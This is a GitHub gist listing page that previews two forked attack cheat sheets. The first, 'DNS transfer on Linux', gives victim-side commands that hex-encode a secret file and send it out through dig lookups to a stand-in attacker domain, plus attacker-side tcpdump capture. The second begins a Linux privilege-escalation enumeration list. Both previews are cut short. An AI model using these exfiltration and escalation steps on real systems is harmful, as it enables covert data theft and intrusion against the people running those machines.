'(◣_◢)' Cynesiz
Cynesiz
/ dns_egress_nix
Created
May 30, 2016 21:47
— forked from sckalath/dns_egress_nix
DNS transfer on Linux
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| On victim: | |
| 1. Hex encode the file to be transferred: | |
| xxd -p secret file.hex | |
| 2. Read in each line and do a DNS lookup: | |
| for b in 'cat file.hex'; do dig $b.shell.evilexample.com;done | |
| On attacker: | |
| 1. Capture DNS exfil packets | |
| tcpdump -w /tmp/dns -s0 port 53 and host system.example.com | |
| 2. Cut the exfilled hex from the DNS packet |
Cynesiz
/ linux_privesc
Created
May 30, 2016 21:40
— forked from sckalath/linux_privesc
Linux Privilege Escalation Techniques
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Determine linux distribution and version | |
| cat /etc/issue | |
| cat /etc/*-release | |
| cat /etc/lsb-release | |
| cat /etc/redhat-release | |
| // Determine kernel version - 32 or 64-bit? | |
| cat /proc/version | |
| uname -a | |
| uname -mrs |
NewerOlder